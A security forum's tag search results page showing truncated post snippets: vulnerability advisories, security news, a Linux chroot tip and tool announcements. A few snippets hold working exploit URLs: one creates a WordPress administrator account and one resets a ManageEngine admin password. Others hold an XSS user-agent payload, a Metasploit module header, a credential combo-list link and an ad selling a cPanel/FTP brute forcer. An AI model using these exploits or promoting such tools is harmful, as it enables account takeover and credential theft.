Jump to content

Search the Community

Showing results for tags 'user'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Just a moment... username:adytzu98
  2. Aveam de parsat dimineata asta texturile tweeturilor rezultate in urma interogarii API-ului public de la Twitter. Ele vin ca si text simplu dar pentru prezentarea/afisarea lor pe o pagina probabil vreti sa adaugati hyperlink pe hashtag-uri sau user mentions. Doua librarii ce v-ar putea ajuta: 1. Python - https://github.com/edburnett/twitter-text-python Daca vreti sa faceti magia in backend 2. JS - https://github.com/twitter/twitter-text/tree/master/js Daca vreti doar la nivel de frontend.
  3. Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery During a penetration test, RedTeam Pentesting discovered a vulnerability in the management web interface of an Alcatel-Lucent OmniSwitch 6450. The management web interface has no protection against cross-site request forgery attacks. This allows specially crafted web pages to change the switch configuration and create users, if an administrator accesses the website while being authenticated in the management web interface. Details ======= Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855, 69
  4. SQL Email Pass Combo List Check Paste Url | SPaste super combo list user pass Check Paste Url | SPaste
  5. # Exploit Title: WordPress WP Membership plugin [Privilege escalation] # Contact: https://twitter.com/panVagenas # Vendor Homepage: http://wpmembership.e-plugins.com/ # Software Link: http://codecanyon.net/item/wp-membership/10066554 # Version: 1.2.3 # Tested on: WordPress 4.2.2 # CVE: CVE-2015-4038 1 Description Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action. Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because th
  6. The St. Louis Federal Reserve today sent a message to those it serves alerting them that in late April 2015 attackers succeeded in hijacking the domain name servers for the institution. The attack redirected Web searches and queries for those seeking a variety of domains run by the government entity to a Web page set up by the attackers in an apparent bid by cybercrooks to hijack online communications of banks and other entities dealing with the regional Fed office. The communique, shared by an anonymous source, was verified as legitimate by a source at another regional Federal Reserve locati
  7. Same origin bypasses using clickjacking Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. It is a browser security issue that is a vulnerability across a variety of browsers and platforms. A clickjack takes the form of embedded code or a script that can execute without the user’s knowledge, such a
  8. eFront 3.6.15 Multiple SQL Injection Vulnerabilities [+] Author: Filippo Roncari | Luca De Fulgentis [+] Target: eFront [+] Version: 3.6.15 and probably lower [+] Vendor: www.efrontlearning.net [+] Accessibility: Remote [+] Severity: High [+] CVE: <requested> [+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf [+] Info: f.roncari@securenetwork.it [+] Summary eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning commun
  9. Document Title: =============== Ebay Inc Xcom #6 - Persistent POST Inject Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1227 Release Date: ============= 2015-03-24 Vulnerability Laboratory ID (VL-ID): ==================================== 1227 Common Vulnerability Scoring System: ==================================== 3.9 Product & Service Introduction: =============================== eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered in San Jose, California. It was founded by
  10. AddMeFast-Bot Automating the process of liking/subscribing/viewing etc... on addmefast.com in order to get points and benefit from their service Update: now working anymore, 01-10-2015 import mechanizeimport re from time import sleep import threading #cut something in many parts def chunkIt(seq, num): avg = len(seq) / float(num) out = [] last = 0.0 while last < len(seq): out.append(seq[int(last):int(last + avg)]) last += avg return out #generates a browser def genbrowser(): br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_redirect(True) br.addheaders = [('User-agent', 'Mo
  11. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Product: phpTrafficA Product page: phpTrafficA Homepage Affected versions: Up to and including 2.3 (latest as of writing). Description: The user agent string provided by the browser is not sanitized nor escaped when handled. This string is then outputting into HTML code on the "Latest visitors > Details" page, leading to HTML injection that can be abused to perform XSS. For example, the following user agent will cause a JavaScript dialogbox to pop up as soon as the page is visited: "><script>alert();</script> This page can be hi
  12. Long story short: wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=USERUL&user_pass=PAROLA&role=administrator Some credits: Vulnerabilities discovered by Evex
  13. Slider Pro is mostly a perfectly responsive plus press–empowered Wp slider plugin that will allows you to make expert and sophisticated sliders. This particular slider wordpress extension was in fact built utilizing user expertise in thoughts, determined to provide a clear and easy-to-use user interface within the administration area and also a soft nav expertise for the users. Download
  14. Testat 3 min in urma key ul si merge perfect .. Sters , pe motiv sa nu vada toti ratatii ...
  15. Abstract Web browsers or mobile browsers are software applications that act as the intermediary applications between a user and the World Wide Web and are used to access information from the Web. Some of the popular browsers which we are using in our daily life are Google Chrome, Mozilla Firefox, Internet Explorer, Opera, Safari, etc. With their wide usage and increasing popularity, they have become one of the major targets for exploitation by hackers. A small mistake during the coding of the application may result in it being vulnerable to intrusions. This article is going to cover a few brow
  16. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local include Msf::Post::Windows::Runas include Msf::Post::Windows::Priv def initialize(info = {}) super(update_info(info, 'Name' => "Windows Run Command As User", 'Description' => %q{ This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned
  17. A vulnerability exists in the Manage Engine Desktop Central 9 application that affects version (build 90130). This may affect earlier releases as well. The vulnerability allows a remote unauthenticated user to change the password of any Manage Engine Desktop Central user with the ‘Administrator’ role (DCAdmin). The following proof of concept URL changes the ‘admin’ user password to ‘admin3’. http://<IP>:8020/servlets/DCOperationsServlet?operation=addOrModifyUser&roleId=DCAdmin&userName=admin&password=admin3 The XML response suggests the user modification failed, however a us
  18. When a company is breached, the typical reaction is to increase security across the board. But Twitch, the Amazon-owned game streaming company, has decided to reduce the minimum number of characters in user passwords, thereby allowing users to have less secure logins, in response to customer complaints. The attack was announced yesterday on a company blog, whilst emails were also sent to concerned users. There’s little detail on the extent of the attack; Twitch simply said all user passwords were to be reset after it detected possible unauthorized access to some Twitch user account information
  19. Advisory ID: SGMA15-001 Title: DokuWiki persistent Cross Site Scripting Product: DokuWiki Version: 2014-09-29c and probably prior Vendor: www.dokuwiki.org Vulnerability type: Persistent XSS Risk level: Medium Credit: Filippo Cavallarin - segment.technology CVE: N/A Vendor notification: 2015-03-18 Vendor fix: 2015-03-19 Public disclosure: 2015-03-23 Details DokuWiki version 2014-09-29c (and probably prior) is vulnerable to Persistent Cross Site Scriptng in the admin page. An attacker may use this vulnerability to execute javascript in the context of a logged admin user. Since the vuln
  20. To be able to restric a Linux user to www folder and disable ssh access, in my example maned user_name, we should proceed some steps: 1) Edit file /etc/ssh/sshd_config and add the next lines AllowUsers [COLOR="#FF0000"]user_name[/COLOR] Match User [COLOR="#FF0000"]user_name[/COLOR] ChrootDirectory /var/www ForceCommand internal-sftp 2) Edit the file /etc/passwd like in the next example: [COLOR="#FF0000"]user_name[/COLOR]:1003:1002::/var/www:/bin/false 3) Add user to www-data group using command: usermod -a -G www-data [COLOR="#FF0000"]user_name[/COLOR] 4) The final step is to
  21. Se vinde sursa bruter cPanel + FTP facut in python, threaded. Este mult mai avansat decat alte ragalii publice, are anumiti algoritmi de creere a userilor, nu incearca doar pe user de lungime 8 caractere sau chestii de genu.. Se creeaza pana la 50 combinatii de useri, se pot adauga la lista (la inceput sau la final) si useri predefiniti gen www, ftp, admin etc... Brute-ul se face in ordinea user pass ip , pentru a mari timpul dintre requesturi si implicit a evita anumite sisteme de anti-brute. Toate update-urile sunt gratuite si anuntate in acest topic (daca nu se inchide sau ceva). Pretul es
  22. Zer0 is a user friendly file deletion tool with a high level of security. With Zer0, you'll be able to delete files and to prevent file recovery by a 3rd person. So far, no user reported an efficient method to recover a file deleted by Zer0. Features User friendly HMI : Drag'n'drop, 1 click and the job is done ! High security file deletion algorithm Multithreaded application core : Maximum efficiency without freezing the application. Internationalization support. DOWNLOAD LINK :- KC Softwares
  23. Drupal, one of the widely used open source content management system is recommending its users to update their software to the latest versions 6.35 and 7.35 after the company discovered two moderately critical vulnerabilities that may allow an attacker to hack Drupal websites. According to a security advisory published yesterday, a flaw found in the Drupal core could allow a potential hacker under certain circumstances to bypass security restrictions by forging the password reset URLs. ACCESS BYPASS / PASSWORD RESET URLs VULNERABILITY Successful exploitation of this Access Bypass vulnerability
  24. Apple on Tuesday pushed out new versions of its Safari browser that address 17 security vulnerabilities in the WebKit engine. Safari 8.04, 7.14 and 6.24 patch multiple memory corruption issues in WebKit, Apple said. “These issues were addressed through improved memory handling,” Apple said in its advisory. The advisory is sparse in other details on individual CVEs; Apple said that users visiting a website hosting an exploit could put the browser at risk to remote code execution or a crash. A separate WebKit vulnerability affects the user interface and could open the door to phishing attacks. “
×
×
  • Create New...